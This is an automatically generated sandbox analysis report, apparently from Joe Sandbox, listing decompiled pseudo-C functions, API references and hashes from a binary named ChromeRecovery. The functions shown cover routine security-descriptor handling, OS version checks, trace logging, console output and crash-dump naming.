																		if(_v20 == 0) {
																			_v32 = 0;
																		} else {
																			_push(_v20);
																			_v32 = E00C83B1B();
																		}
																		if(_v16 == _t190) {
																			_v36 = _t190;
																		} else {
																			_push(_v16);
																			_v36 = E00C83B1B();
																		}
																		_t118 = _v24;
																		if(_t118 == 0) {
																			_v40 = _t190;
																		} else {
																			_push(_t118);
																			_v40 = E00C83B1B();
																			_t118 = _v24;
																		}
																		_t156 = _v28;
																		if(_t156 != 0) {
																			_push(_t156);
																			_t128 = E00C83B1B();
																			_t156 = _v28;
																			_t190 = _t128;
																			_t118 = _v24;
																		}
																		if(_t149 == 0 || _v20 != 0 && _v32 == 0) {
																			L65:
																			_t181 = 0x8007000e;
																			goto L66;
																		} else {
																			_t178 = _v36;
																			if(_v16 == 0 || _t178 != 0) {
																				_t124 = _v40;
																				if(_t118 == 0 || _t124 != 0) {
																					if(_t156 == 0 || _t190 != 0) {
																						_t156 =  &_v24;
																						if(MakeAbsoluteSD(_t181[1], _t149,  &_v44, _t124, _t156, _t190,  &_v28, _v32,  &_v20, _t178,  &_v16) != 0) {
																							_t97 = E00C72C7E(_t181);
																							_t181[1] = _t149;
																							goto L63;
																						} else {
																							_t181 = E00C72482();
																							L66:
																							E00C83557(_t149);
																							E00C83557(_v32);
																							E00C83557(_v36);
																							E00C83557(_v40);
																							E00C83557(_t190);
																							_t208 = _t208 + 0x14;
																							_push(_t181);
																							L68:
																							E00C71185(_t156);
																							goto L69;
																						}
																					} else {
																						goto L65;
																					}
																				} else {
																					goto L65;
																				}
																			} else {
																				goto L65;
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x00c7591a
0x00c7591a
0x00c7591a
0x00c7591b
0x00c7591d
0x00c7591e
0x00c75920
0x00c75922
0x00c75928
0x00c7594b
0x00c7594d
0x00c75952
0x00000000
0x00c7592a
0x00c7592a
0x00c7592f
0x00c75934
0x00000000
0x00c75936
0x00c7593a
0x00c75947
0x00c759c6
0x00000000
0x00c75949
0x00c75956
0x00c75956
0x00c75959
0x00c75962
0x00c759cb
0x00c759cb
0x00000000
0x00c75964
0x00c75964
0x00c75965
0x00c75965
0x00c75969
0x00c75970
0x00c75978
0x00c7597a
0x00c7597d
0x00c7598b
0x00c75991
0x00c75994
0x00c759bb
0x00c759bd
0x00c759c2
0x00c759c3
0x00000000
0x00c759a6
0x00c759b2
0x00c759b2
0x00c7597f
0x00c7597f
0x00c759d0
0x00c759d0
0x00c759d5
0x00c759d6
0x00c759d7
0x00c759d9
0x00c759dc
0x00c759dd
0x00c759df
0x00c759e0
0x00c759e5
0x00c759e7
0x00c759ec
0x00c759ec
0x00c759ef
0x00c759f5
0x00c75a16
0x00000000
0x00c759f7
0x00c759ff
0x00c75a0c
0x00c75aa2
0x00000000
0x00c75a12
0x00c75a1b
0x00c75a1b
0x00c75a1c
0x00c75a1f
0x00c75a1f
0x00c75a24
0x00c75a5f
0x00000000
0x00c75a2c
0x00c75a2e
0x00c75a34
0x00c75a3c
0x00c75a3e
0x00c75a41
0x00c75aa7
0x00c75aa7
0x00000000
0x00c75a43
0x00c75a48
0x00c75a4d
0x00c75a53
0x00c75a58
0x00c75a58
0x00c75a61
0x00c75a61
0x00c75a64
0x00c75a70
0x00c75a6a
0x00c75a6a
0x00c75a6a
0x00c75a80
0x00c75a9f
0x00c75a82
0x00c75a88
0x00c75a8a
0x00c75a8f
0x00c75a90
0x00c75aac
0x00c75aac
0x00c75ab1
0x00c75ab2
0x00c75ab3
0x00c75ab5
0x00c75ab8
0x00c75ab9
0x00c75abf
0x00c75c05
0x00c75c07
0x00c75ac5
0x00c75ac5
0x00c75ac9
0x00c75acf
0x00c75ad6
0x00c75ade
0x00c75c37
0x00000000
0x00c75ae4
0x00c75aeb
0x00c75c04
0x00000000
0x00c75af1
0x00c75af4
0x00c75afc
0x00c75b04
0x00c75b0c
0x00c75b14
0x00c75b1c
0x00c75b2b
0x00c75c41
0x00c75c41
0x00c75c46
0x00c75c47
0x00c75c48
0x00c75c4b
0x00c75c4d
0x00c75c52
0x00c75c55
0x00c75c58
0x00c75c81
0x00000000
0x00c75c5a
0x00c75c5d
0x00c75c65
0x00c75c80
0x00c75c67
0x00c75c6f
0x00c75c71
0x00c75c76
0x00c75c7a
0x00c75c7b
0x00c75c86
0x00c75c86
0x00c75c8b
0x00c75c8c
0x00c75c8f
0x00c75c90
0x00c75c92
0x00c75c98
0x00c75ca1
0x00c75ca3
0x00c75ca6
0x00c75cac
0x00c75cb1
0x00c75cb1
0x00c75c65
0x00c75b31
0x00c75b31
0x00c75b32
0x00c75b3a
0x00c75b40
0x00c75b50
0x00c75b42
0x00c75b42
0x00c75b4b
0x00c75b4b
0x00c75b56
0x00c75b66
0x00c75b58
0x00c75b58
0x00c75b61
0x00c75b61
0x00c75b69
0x00c75b6e
0x00c75b7f
0x00c75b70
0x00c75b70
0x00c75b76
0x00c75b79
0x00c75b7c
0x00c75b82
0x00c75b87
0x00c75b89
0x00c75b8a
0x00c75b90
0x00c75b93
0x00c75b95
0x00c75b95
0x00c75b9a
0x00c75c08
0x00c75c08
0x00000000
0x00c75ba8
0x00c75bac
0x00c75baf
0x00c75bb7
0x00c75bba
0x00c75bc2
0x00c75bd9
0x00c75bee
0x00c75bfb
0x00c75c00
0x00000000
0x00c75bf0
0x00c75bf5
0x00c75c0d
0x00c75c0e
0x00c75c16
0x00c75c1e
0x00c75c26
0x00c75c2c
0x00c75c31
0x00c75c34
0x00c75c3c
0x00c75c3c
0x00000000
0x00c75c3c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00c75baf
0x00c75b9a
0x00c75b2b
0x00c75aeb
0x00c75ade
0x00c75abf
0x00c75a80
0x00c75a41
0x00c75a24
0x00c75a0c
0x00c759f5
0x00c7597d
0x00c75962
0x00c75947
0x00c75934

APIs

GetLengthSid.ADVAPI32(00C760D1,00000220,00C760CD,00000000,?,?,?,80004005,00CA35C8,00000000,00000000,00000000,?,00C760CD), ref: 00C75969

Part of subcall function 00C75AB2: GetSecurityDescriptorControl.ADVAPI32 ref: 00C75AD6
Part of subcall function 00C75AB2: MakeAbsoluteSD.ADVAPI32 ref: 00C75B1C
Part of subcall function 00C75AB2: GetLastError.KERNEL32 ref: 00C75B22

GetSecurityDescriptorGroup.ADVAPI32 ref: 00C7593F

Part of subcall function 00C72482: GetLastError.KERNEL32 ref: 00C72482

CopySid.ADVAPI32 ref: 00C7598B
SetSecurityDescriptorGroup.ADVAPI32 ref: 00C7599C

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: DescriptorSecurity$ErrorGroupLast$AbsoluteControlCopyLengthMake
String ID:
API String ID: 3828051983-0
Opcode ID: efee5eb40d978ac3dd5aae89ad4082f62b49b56909d759fe797b12d08bbdf013
Instruction ID: 849bc3d9a8aba25bf29b95bdbb83b70c56cffe8f9005bf494882261b52567b5e
Opcode Fuzzy Hash: efee5eb40d978ac3dd5aae89ad4082f62b49b56909d759fe797b12d08bbdf013
Instruction Fuzzy Hash: 9A119671510645FBDB14ABB6CC4AF6F776CDF40760B14811AB61DA6180EBB0EE01A664

Uniqueness

Uniqueness Score: -1.00%

Function 00C78D1C Relevance: 6.1, APIs: 4, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E00C78D1C(void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				struct _OSVERSIONINFOEXW _v300;
				void* __ebp;
				signed int _t15;
				void* _t30;
				intOrPtr* _t34;
				signed int _t35;

				_t30 = __edx;
				_t15 =  *0xca8008; // 0x617e0cdd
				_v8 = _t15 ^ _t35;
				_v300.dwOSVersionInfoSize = 0x11c;
				_v300.dwBuildNumber = 0;
				_v300.dwPlatformId = 0;
				E00C81190(0,  &(_v300.szCSDVersion), 0, 0x100);
				_t34 = __imp__VerSetConditionMask;
				_v300.wSuiteMask = 0;
				_v300.wServicePackMinor = 0;
				 *_t34(0, 0, 2, 3, 1, 3, 0x20, 3);
				 *_t34(0, _t30);
				 *_t34(0, _t30);
				_push(_t30);
				_v300.dwMajorVersion = 6;
				_v300.dwMinorVersion = 0;
				_v300.wServicePackMajor = 0;
				VerifyVersionInfoW( &_v300, 0x23, 0);
				return E00C7F35B(_v8 ^ _t35);
			}

0x00c78d1c
0x00c78d25
0x00c78d2c
0x00c78d33
0x00c78d48
0x00c78d50
0x00c78d56
0x00c78d5b
0x00c78d66
0x00c78d69
0x00c78d7b
0x00c78d7f
0x00c78d83
0x00c78d85
0x00c78d8f
0x00c78d9b
0x00c78da2
0x00c78da6
0x00c78dbe

APIs

VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 00C78D7B
VerSetConditionMask.KERNEL32(00000000,?,?,?), ref: 00C78D7F
VerSetConditionMask.KERNEL32(00000000), ref: 00C78D83
VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 00C78DA6

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersion
String ID:
API String ID: 2793162063-0
Opcode ID: 301474f1bf6b55319e66652807958d96328079a31f956997db9a0a58cb86cbd4
Instruction ID: b449b5e724f8b341ebef360121a9cc84a3bddcea10262b3797d33554a6dce484
Opcode Fuzzy Hash: 301474f1bf6b55319e66652807958d96328079a31f956997db9a0a58cb86cbd4
Instruction Fuzzy Hash: 8E111670A51318AADB20DB659C4AFEFBBFCDFC5B10F00409AB508A6180DA745B558A95

Uniqueness

Uniqueness Score: -1.00%

Function 00C790C3 Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00C790C3(intOrPtr* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				char _t16;
				void* _t25;
				long _t26;
				intOrPtr _t30;
				intOrPtr* _t31;

				_t30 = __edx;
				_t31 = __ecx;
				_t16 = _a4 - 4;
				if(_t16 == 0) {
					__imp__GetTraceLoggerHandle(_a8);
					_t26 = 0;
					 *((intOrPtr*)(__ecx + 0x20)) = _t16;
					 *((intOrPtr*)(__ecx + 0x24)) = __edx;
					if(_t16 != 0 || __edx != 0) {
						__imp__GetTraceEnableFlags(_t16, _t30);
						 *((intOrPtr*)(_t31 + 0x28)) = _t16;
						__imp__GetTraceEnableLevel( *((intOrPtr*)(_t31 + 0x20)),  *((intOrPtr*)(_t31 + 0x24)));
						 *((char*)(_t31 + 0x2c)) = _t16;
						 *((intOrPtr*)( *_t31 + 4))();
					} else {
						_t26 = GetLastError();
					}
					return _t26;
				}
				if(_t16 == 1) {
					 *((char*)(__ecx + 0x2c)) = 0;
					 *((intOrPtr*)(__ecx + 0x28)) = 0;
					 *((intOrPtr*)(__ecx + 0x20)) = 0;
					 *((intOrPtr*)(__ecx + 0x24)) = 0;
					 *((intOrPtr*)( *__ecx + 8))();
					return 0;
				}
				_t25 = 0x57;
				return _t25;
			}

0x00c790c3
0x00c790cb
0x00c790cd
0x00c790d0
0x00c790f6
0x00c790fc
0x00c790fe
0x00c79101
0x00c79106
0x00c79118
0x00c79121
0x00c79127
0x00c7912d
0x00c79134
0x00c7910c
0x00c79112
0x00c79112
0x00000000
0x00c79137
0x00c790d5
0x00c790e0
0x00c790e3
0x00c790e6
0x00c790e9
0x00c790ec
0x00000000
0x00c790ef
0x00c790d9
0x00000000

APIs

GetTraceLoggerHandle.ADVAPI32(?), ref: 00C790F6
GetLastError.KERNEL32 ref: 00C7910C

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: ErrorHandleLastLoggerTrace
String ID:
API String ID: 2334736533-0
Opcode ID: 90805e08213ac54d0f65089b51a13ced26a5a47914743bc1e865987ab7225525
Instruction ID: 0f7e92e2272c88ca20b52117f9bd493e35128d05bc5e1568c99cbf43d3c13e39
Opcode Fuzzy Hash: 90805e08213ac54d0f65089b51a13ced26a5a47914743bc1e865987ab7225525
Instruction Fuzzy Hash: D4012575615B01EFD7219F7A988C96ABBF4FB1C3507908A2EE58EC2620D631E810CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00C91DF6 Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00C91DF6(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0xca8890, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E00C91DDF();
					E00C91DA1();
					_t13 = WriteConsoleW( *0xca8890, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x00c91e13
0x00c91e17
0x00c91e24
0x00c91e29
0x00c91e44
0x00c91e44
0x00c91e4a

APIs

WriteConsoleW.KERNEL32(?,00000022,00000000,00000000,?), ref: 00C91E0D
GetLastError.KERNEL32 ref: 00C91E19

Part of subcall function 00C91DDF: CloseHandle.KERNEL32 ref: 00C91DEF

___initconout.LIBCMT ref: 00C91E29

Part of subcall function 00C91DA1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00C91DB4

WriteConsoleW.KERNEL32(?,00000022,00000000,00000000), ref: 00C91E3E

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 01ffcbe6459f06b166f97e9ef06a87bf5764869dac595d7818cd1082f896e138
Instruction ID: 6cd73c45cf3c2b2f08459d56bf9f136d82106954b615826fa6661cd0a30a1058
Opcode Fuzzy Hash: 01ffcbe6459f06b166f97e9ef06a87bf5764869dac595d7818cd1082f896e138
Instruction Fuzzy Hash: 33F0AC36511115BBCF222FD5DC0EB9D3F66FB097B1B454111FE1D96160DA328960EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C825BA Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E00C825BA(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed int _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E00C819CC(_t96, __ecx, __edx, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E00C819CC(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E00C816D7(_t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E00C81609(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E00C8219B(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E00C84C30(_t96, _t100, _t110, 0, _t121, __eflags);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					__eflags = _t78;
					if(_t78 == 0) {
						L41:
						_t80 = 1;
						__eflags = 1;
					} else {
						_t101 = _t78 + 8;
						__eflags =  *_t101;
						if( *_t101 == 0) {
							goto L41;
						} else {
							__eflags =  *_t111 & 0x00000080;
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0) {
								L23:
								_t97 = _t116[4];
								_t123 = 0;
								__eflags = _t78 - _t97;
								if(_t78 == _t97) {
									L33:
									__eflags =  *_t116 & 0x00000002;
									if(( *_t116 & 0x00000002) == 0) {
										L35:
										_t81 = _a8;
										__eflags =  *_t81 & 0x00000001;
										if(( *_t81 & 0x00000001) == 0) {
											L37:
											__eflags =  *_t81 & 0x00000002;
											if(( *_t81 & 0x00000002) == 0) {
												L39:
												_t123 = 1;
												__eflags = 1;
											} else {
												__eflags =  *_t111 & 0x00000002;
												if(( *_t111 & 0x00000002) != 0) {
													goto L39;
												}
											}
										} else {
											__eflags =  *_t111 & 0x00000001;
											if(( *_t111 & 0x00000001) != 0) {
												goto L37;
											}
										}
									} else {
										__eflags =  *_t111 & 0x00000008;
										if(( *_t111 & 0x00000008) != 0) {
											goto L35;
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										__eflags = _t98 -  *_t82;
										if(_t98 !=  *_t82) {
											break;
										}
										__eflags = _t98;
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											__eflags = _t99 -  *((intOrPtr*)(_t82 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												__eflags = _t99;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										__eflags = _t83;
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									__eflags = _t83;
									goto L31;
								}
							} else {
								__eflags =  *_t116 & 0x00000010;
								if(( *_t116 & 0x00000010) != 0) {
									goto L41;
								} else {
									goto L23;
								}
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x00c825ba
0x00c825ba
0x00c825c1
0x00c825ca
0x00c826e9
0x00c825d0
0x00c825d0
0x00c825d1
0x00c825d2
0x00c825dc
0x00c825df
0x00c825e5
0x00c825ef
0x00c82614
0x00c82619
0x00c8261e
0x00c826e5
0x00000000
0x00c826e6
0x00c8261e
0x00c825ef
0x00c82624
0x00c82627
0x00c8262a
0x00c82630
0x00c82636
0x00c82648
0x00c8264d
0x00c82650
0x00c82653
0x00c82656
0x00c82659
0x00c8265f
0x00c82665
0x00c82668
0x00c8266b
0x00c8267a
0x00c8267b
0x00c8267b
0x00c82680
0x00c82693
0x00c82695
0x00c8269a
0x00c826a5
0x00c826a7
0x00c826a9
0x00c826c5
0x00c826ca
0x00c826cd
0x00c826cd
0x00c826a5
0x00c8269a
0x00c826d3
0x00c826d4
0x00c826d7
0x00c826da
0x00c826dd
0x00c826e0
0x00c8266b
0x00000000
0x00c8265f
0x00c826ea
0x00c826ef
0x00c826f3
0x00c826f6
0x00c826f7
0x00c826f8
0x00c826f9
0x00c826fc
0x00c826fe
0x00c82776
0x00c82778
0x00c82778
0x00c82700
0x00c82700
0x00c82703
0x00c82706
0x00000000
0x00c82708
0x00c82708
0x00c8270b
0x00c8270e
0x00c82715
0x00c82715
0x00c82718
0x00c8271a
0x00c8271c
0x00c8274e
0x00c8274e
0x00c82751
0x00c82758
0x00c82758
0x00c8275b
0x00c8275e
0x00c82765
0x00c82765
0x00c82768
0x00c8276f
0x00c82771
0x00c82771
0x00c8276a
0x00c8276a
0x00c8276d
0x00000000
0x00000000
0x00c8276d
0x00c82760
0x00c82760
0x00c82763
0x00000000
0x00000000
0x00c82763
0x00c82753
0x00c82753
0x00c82756
0x00000000
0x00000000
0x00c82756
0x00c82772
0x00c8271e
0x00c8271e
0x00c8271e
0x00c82721
0x00c82721
0x00c82723
0x00c82725
0x00000000
0x00000000
0x00c82727
0x00c82729
0x00c8273d
0x00c8273d
0x00c8272b
0x00c8272b
0x00c8272e
0x00c82731
0x00000000
0x00c82733
0x00c82733
0x00c82736
0x00c82739
0x00c8273b
0x00000000
0x00000000
0x00000000
0x00000000
0x00c8273b
0x00c82731
0x00c82746
0x00c82746
0x00c82748
0x00000000
0x00c8274a
0x00c8274a
0x00c8274a
0x00000000
0x00c82748
0x00c82741
0x00c82743
0x00c82743
0x00000000
0x00c82743
0x00c82710
0x00c82710
0x00c82713
0x00000000
0x00000000
0x00000000
0x00000000
0x00c82713
0x00c8270e
0x00c82706
0x00c82779
0x00c8277d
0x00c8277d

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00C825DF

Strings

MOC, xrefs: 00C825F1
RCC, xrefs: 00C825F9

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: af06c29a1633eca883b563a10b1ef2586ab5bc1aecc5c646c79318a781dde45c
Instruction ID: 8e3eb5a2512e6dbd27edcc726e4f4b8d02c7179071d1a19db85a4717a63467e1
Opcode Fuzzy Hash: af06c29a1633eca883b563a10b1ef2586ab5bc1aecc5c646c79318a781dde45c
Instruction Fuzzy Hash: C1416A72900209EFCF16EF98CD89AEEBBB5FF48308F184059F914A7211E3359A51DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00C79604 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00C79604(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _v9;
				char _v12;
				char _v16;
				intOrPtr _v17;
				void* __edi;
				void* __ebp;
				void* _t27;
				char _t44;
				void* _t48;
				intOrPtr* _t52;
				void* _t62;

				_t62 = __eflags;
				_t48 = __edx;
				_v9 = 0;
				_t52 = __ecx;
				EnumWindows(E00C796C9,  &_v9);
				E00C71AD8( &_v12, _t48, E00C713D8());
				_push(_a8);
				E00C77D9C( &_v16, L"%s\\%s.dmp", _a4);
				E00C77D09( &_v16);
				_t34 = _v17;
				_t27 = E00C7AD79(_v17,  *_t52, _t62,  &_v16);
				if( *((char*)(_t52 + 1)) == 0) {
					_t55 = _v12;
				} else {
					_push(_a8);
					E00C77D9C( &_v12, L"%s\\%s-full.dmp", _a4);
					E00C77D09( &_v12);
					_t55 = _v12;
					_t44 = _v12;
					_t27 = E00C7506D(_t44, _t52);
					_t64 = _t27;
					if(_t27 != 0) {
						_push(_t44);
						_t27 = E00C7AD79(_t34,  *_t52, _t64,  &_v12);
					}
				}
				return E00C713C0(_t27, _t55 - 0x10);
			}

0x00c79604
0x00c79604
0x00c79614
0x00c7961f
0x00c79621
0x00c79631
0x00c79636
0x00c79646
0x00c7964f
0x00c79654
0x00c79664
0x00c7966f
0x00c796b4
0x00c79671
0x00c79671
0x00c79681
0x00c7968d
0x00c79692
0x00c79696
0x00c79698
0x00c7969d
0x00c7969f
0x00c796a7
0x00c796ab
0x00c796b1
0x00c7969f
0x00c796c6

APIs

EnumWindows.USER32(00C796C9,?), ref: 00C79621

Part of subcall function 00C713D8: GetProcessHeap.KERNEL32 ref: 00C713E9

Part of subcall function 00C7506D: GetFileAttributesExW.KERNEL32(000000FF,00000000,?), ref: 00C75091

Strings

%s\%s-full.dmp, xrefs: 00C7967B
%s\%s.dmp, xrefs: 00C79640

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: AttributesEnumFileHeapProcessWindows
String ID: %s\%s-full.dmp$%s\%s.dmp
API String ID: 600023215-1721437685
Opcode ID: 2962121fac9d58b9079ca14f4b93c1877ffd4dedc4ecf001b670169b99732b5b
Instruction ID: b6dcebb7ecd3413b5e3996d1e3d7e986d4bd4eb11869f1b3ccabae44c945593d
Opcode Fuzzy Hash: 2962121fac9d58b9079ca14f4b93c1877ffd4dedc4ecf001b670169b99732b5b
Instruction Fuzzy Hash: 5A11DA72008207AAC715FF64EC029EE7BE9DF92714F14865DF88857192FA31AA1CD792

Uniqueness

Uniqueness Score: -1.00%

Function 00C733D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E00C733D6(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4) {
				WCHAR* _v8;
				void* __ebp;
				void* _t21;
				intOrPtr _t23;
				void* _t24;
				void* _t44;
				WCHAR* _t48;
				intOrPtr* _t50;

				_push(__ecx);
				E00C71AD8( &_v8, __edx, E00C713D8());
				_t48 = _v8;
				if((1 -  *((intOrPtr*)(_t48 - 4)) |  *((intOrPtr*)(_t48 - 8)) - 0x00000104) < 0) {
					E00C71BA8( &_v8, 0x104, 0x104);
					_t48 = _v8;
				}
